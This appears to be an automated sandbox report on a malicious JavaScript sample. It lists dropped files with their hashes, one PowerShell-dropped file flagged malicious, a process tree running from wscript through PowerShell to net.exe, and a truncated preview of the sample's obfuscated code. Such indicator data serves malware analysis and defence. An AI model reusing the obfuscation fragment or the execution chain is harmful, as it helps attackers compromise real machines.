SHA-512: | 00B91199BAEC94E045BC28543EA3C82A72CC06F69DAFCEF6E4EC712D848824016F2D4B1A79612362408C5B29CB7F7FD5B8AF03AA6FD73F5CB7E454288B158619 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.290811779096314 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFiehwdn4mSg1c2LjcWkHvR0YwiUoAvJfYdPeUkwRe9:YvXKXF3hwBrT5LjIPxGg8Ukee9 |
MD5: | D7C258B27942C0D9F36279AE6EA97483 |
SHA1: | B1A0D7129E3BC752646208356622B6043E55C109 |
SHA-256: | DB8B4109548EF37D8672600D1C1E2DF9AD15DC1273FF9581A9DDD82CE598F0CC |
SHA-512: | 9B6358A935A7F0330714DECB40C5B2F82C838A362F8F63052192BF13C4BCA47378D2855E0B8A85CD5D985E6DD06BB1FFAC35C451038113FA26ECA5C5C806BE72 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.2769993783943 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFiehwdn4mSg1c2LjcWkHvR0YwiUoAvJf+dPeUkwRe9:YvXKXF3hwBrT5LjIPxG28Ukee9 |
MD5: | 935100E2242F94E5BBAF48E65C9C7F4D |
SHA1: | 87786A3DCDD188C3B2C4C5D81CCF066958931F65 |
SHA-256: | 7F7F3181797EAB3C40780DD9607171BA85EBAB0843BADFE865E01A48C68452B8 |
SHA-512: | 167292C6EAC54DCC2397EE749F520996649A6AFAF9B2CCA32BA13FF65BEAF3DAAFF6545F71B71707D02D3095CEA306911AC13E766C000B272CFC33B63665C20F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.274422026054741 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFiehwdn4mSg1c2LjcWkHvR0YwiUoAvJfbPtdPeUkwRe9:YvXKXF3hwBrT5LjIPxGDV8Ukee9 |
MD5: | DE98E2F90456D272EB375D30CE31A1A8 |
SHA1: | 9300D7515769601B0D4357E49BA3A47BB1C37727 |
SHA-256: | 35AA351389ADDBBD12E4C357AAB14FA12B11AAB0FF19AD6D88B19A072AECB014 |
SHA-512: | CE9CFA95E61ED94BF4507716498723144894B0E56C65539731E9AA11F9C0632EED4C6644F506AA127D2443AB85A317324FB0EADECA4C1370A863E0192EE95CAF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.2663691554822085 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFiehwdn4mSg1c2LjcWkHvR0YwiUoAvJf21rPeUkwRe9:YvXKXF3hwBrT5LjIPxG+16Ukee9 |
MD5: | 731C7E35E7FDCB16CBEF8F268725B867 |
SHA1: | F02EDE8882F53C93A10476B89862C50FA51B4CCB |
SHA-256: | 69B2BF703D35DDEDE8F7F1703AD7803E9CE795A1628AEE2CD243BE7A341CD464 |
SHA-512: | 23E00A40638B7FEABF9969224F0A0E9EBBF587214D79A3A6C997F7AE121FC383CDFE577A1A6CC78FF8CFA8D848EC951C9832F961B30F84725496AC0A49F3A5EA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.662416868044167 |
Encrypted: | false |
SSDEEP: | 24:Yv6XJhurT5XIyamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSR:YvcsXjBgkDMUJUAh8cvMR |
MD5: | E781379E290F21C60A290F7671DC35F5 |
SHA1: | 4AFB39E6D90F219B0C57B679B0D1B0F4EE2B3751 |
SHA-256: | 43914834D73E653041476B6BAB87292B722B0FE8B18CB3D1DE0107DB2E4CBF93 |
SHA-512: | F27B916322ECFB749C954AFC9FB5ED2D6EDEC8312DE8A861277C9257856E05AC02F0F25BB98CFE695CA08C77B443DFDE746E7467644871E3CA3F052777B50531 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.242364080699049 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFiehwdn4mSg1c2LjcWkHvR0YwiUoAvJfshHHrPeUkwRe9:YvXKXF3hwBrT5LjIPxGUUUkee9 |
MD5: | 47AE63B1DC28599C1F4C0CF10BFD8D0D |
SHA1: | 9809864C9535ECBE1047F71411F431D5C0F1CFE6 |
SHA-256: | D199768F054CC20F18A781AE0FAF2676D8A3C4D10583306365FC7A2454AD68F7 |
SHA-512: | F2397E10109D112CD8A205FAF5D5333F27E5D352F4759EECA0D4158A6054917305EB06DE2ADC551E76746B5B2D7FD633BCAB030BA848AFA9580A1288F0831693 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.236912577359393 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFiehwdn4mSg1c2LjcWkHvR0YwiUoAvJTqgFCrPeUkwRe9:YvXKXF3hwBrT5LjIPxGTq16Ukee9 |
MD5: | 7DE9A6D3627F69B215806A69F3023143 |
SHA1: | 0BE6635F7205C45BADFAA6CCB438A4B8BA49FA5F |
SHA-256: | 611CF7069996C98F233679A4380381B464E6D7A1B4B3CA2A7DFDB9816FC16596 |
SHA-512: | 65726A83A077EB073B33B7ED595CE101FEA55639B11159EB43453BC2C0379AA1FDE139CD12232692609F650B8986E4A42D63C9EF7039260498524B52607835F2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.138506512255603 |
Encrypted: | false |
SSDEEP: | 24:YNXg1u9aSay5bItKgr/2t4TN4wHL2EYdjQyj0Sb70T2k2LSlCWNEMCbur1LA5May:Y9gIPbNumuQNQESVTfEMCbu58L9tS |
MD5: | 51B224E00CA82269E3A62BD97777FC7A |
SHA1: | A23B52AAC1D79A23678FABDDBD1A2FF9EF1957CD |
SHA-256: | 1E225272C8982FBB450FC1E7BFEC828E3AFFA557D87D35E61D140831F715D381 |
SHA-512: | 34363E875419CBFAF911764FCC472E5896E637C5257F78017C986EAFE4DF5D32A1F19669DC964B1B0678B3A4806283DD1962665CE1BC24B08AC82EBB196F6A4C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.3674619964795243 |
Encrypted: | false |
SSDEEP: | 24:TLBx/XYKQvGJF7urs9S6bqyKn6ylSTofcNqDu0XKdqEKfS8EKfM1ba8F:Tll2GL7msMcKTlS8fcsu7fIQ |
MD5: | 50B065F6A971711A9BB28257BFE4F3BF |
SHA1: | B4995856A06F6A3AD92D3DC4722B16E810E80606 |
SHA-256: | DC46EB5213296B3B64FBD75D41C3CD635E4DF9CBEDBFA9E192164F74E3D15DE9 |
SHA-512: | 43D0CB4B471F625A04F019DCD8D225C158E80E661853F01D575D30F1634D11874C841A3474E9DB4751448751987FD33B23BE5EFAFD9DA1F955D98542FADA5B07 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.8434331453256552 |
Encrypted: | false |
SSDEEP: | 24:7+tUZ6bqyKn6ylSTofcNqDu0+KdqEKfS8EKfM1banbqjqLKufx/XYKQvGJF7ursq:7MCcKTlS8fcsuufISqGufl2GL7msq |
MD5: | B6808799BCFFB4CEB9396222F7F2B76C |
SHA1: | 1F11C71286F82B6E7468CCB68073DA7AF6A385FE |
SHA-256: | F53AECCC446BC136FDD97C7D68F5C792A90F85D9AADB53EE9564C7466AD13AF1 |
SHA-512: | 64DA7794DECDD550E9F6AFCF44BA6FCDF88E22F178692A8AC97329FA8F9A6966B123F78834479EBDF2192DE1FD4488BE5C6C093550264C4DC169759674642515 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgRDpb0MaL3A4p0Q8fcopYGyDaYyu:6a6TZ44ADERDpAMa04p93aK |
MD5: | DCB1EC2247C5EA86790777D58473D18B |
SHA1: | 1844545C26627D5202290723EEE31ABDAC2FAE8D |
SHA-256: | 1429A405C423F0A276AEDF459F497A3A5CB4666034CC36F876D628A3F41C8BCE |
SHA-512: | 6209A30DCC4AC554D143D057A9E20C5F888CAA6425C905454D45ADC40BC29F893A867518F76EF6405B8419C2BC911CF209FA454BEC23D8452DA79D26D345FF06 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul/nq/llh:NllUyt |
MD5: | AB80AD9A08E5B16132325DF5584B2CBE |
SHA1: | F7411B7A5826EE6B139EBF40A7BEE999320EF923 |
SHA-256: | 5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4 |
SHA-512: | 9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.4953527754662135 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClUlQHXH:Qw946cPbiOxDlbYnuRK+bLK3H |
MD5: | 4F09C1A87628AFBFE87748FDF98FB4FB |
SHA1: | 3EB5B7DD04CA73355C4404C1D827261980483BD5 |
SHA-256: | 6218C2703CDA200190AEFB0BC0D7F796DD9D82FC9A3E1CB8191120CA7B243462 |
SHA-512: | 0F3637A52FEC1FAEBDC24AC32EBC1E7DE24E2BCAC778A7744E05D4825E015835BB777846A34C65F8810DB24FF604AE85EB8156A709E4988DBD0023B742701F0E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 22-34-57-438.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.330589339471305 |
Encrypted: | false |
SSDEEP: | 384:usQfQQjZyDzISMjg0svDBjA49Y0/sQHpMVhrSWD0Wny6WxIWd44mJmtaEKHvMMwh:Ink |
MD5: | 5BC0A308794F062FEC40F3016568DF9F |
SHA1: | 14149448191AB45E99011CBBEF39F2A9A03A0D15 |
SHA-256: | 00D910C49F2885F6810F4019A916EFA52F12881CBF1525853D0C184E1B796473 |
SHA-512: | CF12E0787C1C2A129BE61C4572CF8A28FC48039B2ADFD1816E58078D8DD900771442F210C545AD9B3F4EAEC23F6F1480F7BBF262B6A631160B20D0785BC17242 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.352736770248832 |
Encrypted: | false |
SSDEEP: | 384:I/7qTvGmSa9d0SgbxLYJ5KF+lNEXOyyUY3fpzbZ/z+tlrwYRJGNIS9SH+4KmKUKK:Dru |
MD5: | BAD4D642B145CAE11CBB6105648AAFA0 |
SHA1: | 3C7685113C4B3887F559F661643EBE4E4C525E4A |
SHA-256: | 1AED9BC0B24F99205038BFB954E9E59D8DA9F5777419F8F83C37EBFEB70329CB |
SHA-512: | A4B6BB7B4EA786CCC1AC205D6137B37AC772DF64F2E5341FE03BE512D302140E45B4DB39F739AFE8F17ACCB60B2A5ED8C80C478584EB89B31F856CC3452520EA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.379537015198868 |
Encrypted: | false |
SSDEEP: | 192:icbENIn5cbqlcbgIpLcbJcb4I5jcbKcbQIrxcbm2OcbYI1BCYO8Hy5McbN1un3jk:8qnXopZ50rKp1q |
MD5: | 5B5CE0EFBD279AC2118883351282B376 |
SHA1: | 05D25A268178D2BE43B07E598D82857651589722 |
SHA-256: | 3C0A1C3DD788037F6711FCC08E1CA0997EA4945BD1FE33FDA0F26318FE8B1EC1 |
SHA-512: | 27EB682C42B31FA09BA535206742B0B4BF087C259EAC4B2AABDC8E69BF3D153B3AE34D1F46328B85248C09EE79F75A22967055656F67363C5510B71CCC291673 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xLtwYIGNPzWL07o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tGZd:JJwZG5WLxB3mlind9i4ufFXpAXkrfUsb |
MD5: | D38CB76360DDA78820460E5C5F20061C |
SHA1: | F2B65831130B70F2A3DC345F70C4BEEDE9AB40E8 |
SHA-256: | 55E70B5D5F8BE28D648BCDFE7DEB02BF4BBE2F626D620D4D838E0FA4FBF45F8E |
SHA-512: | 5E31738169A6FE92062B0E582489DEEAC2FA1798965DED94EFA994965470A15B5095851701E4DF631C5EC4454913272F1156EC46B32DA782D3C0F9E490C129A1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/xaWL07oywYIGNPUGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JaWLxywZG6GZn3mlind9i4ufFXpAXkru |
MD5: | FFA982D6F2F9B46A1DECDD28BF3EF0E1 |
SHA1: | B1D05ED9BD6A80BD0E3377E9F62B47EF83FCC0C8 |
SHA-256: | 93D954FA4BBEDCDFBC7BF14FA1BB3986056261F4A5035C3CFF229FF16D12B78B |
SHA-512: | BF2931508F2039FFF4A74EC9B2FF2706FCF05DC5D56E22CA9C74B7C4AF9E8B4173419791DE648FD77AE7C4B441734E7C70C964A2B91C816FC98C9BA78BEB7879 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.920045833172915 |
TrID: | |
File name: | 183751298714312883.js |
File size: | 23'008 bytes |
MD5: | 3979840b94b548f7dd183097858df883 |
SHA1: | 45c035f8d7c6428b7d572335d99b5b6110c105f2 |
SHA256: | 73433e530ab6de234ced398dcbd05733a04aa365b3d87ff48ae3bab1c62c5a0d |
SHA512: | 62b15e2151bf86ec283201b5d0de9dd019fca2e6a7a64aa28681b4af7f5ba1c49ef31d22c9a693d46ef38174e757669851d9c2217429b22e3091fe4a129e8adb |
SSDEEP: | 384:XHANNNP6zrH9HIGNGGNNNPLwd4+dwd03pDlrW4UEG54pr+L3UeKAndjFbZ7bwrsL:XHANNNPErH9HIGNGGNNNPLwdVdwdEpD+ |
TLSH: | 5AA266C0C0488BCE55E401303D761CEF74780ADD9A8C509E695B6FAC2DAF7325AE7279 |
File Content Preview: | function mcjbt(){ihrzytll=[1031,3079,5127,4103,2055,3072];var dlionh=this[wdaftsyoa+xjdeyvlu+uwrdz+ntkuf+yhrhdry+oswruh+aaije+jdlbmvwe](this[waidtcyp+uycnnqjjz+krydrupec+uwrdz+grqiledq+wdaftsyoa+jdlbmvwe][ytsfsjuo+uwrdz+yhrhdry+xjdeyvlu+jdlbmvwe+yhrhdry+q |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 22:34:47 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c1120000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 22:34:48 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7ec060000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 22:34:48 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70f010000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 22:34:48 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff760310000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 22:34:53 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6153b0000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 22:34:53 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7ec060000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 22:34:54 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6f0230000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
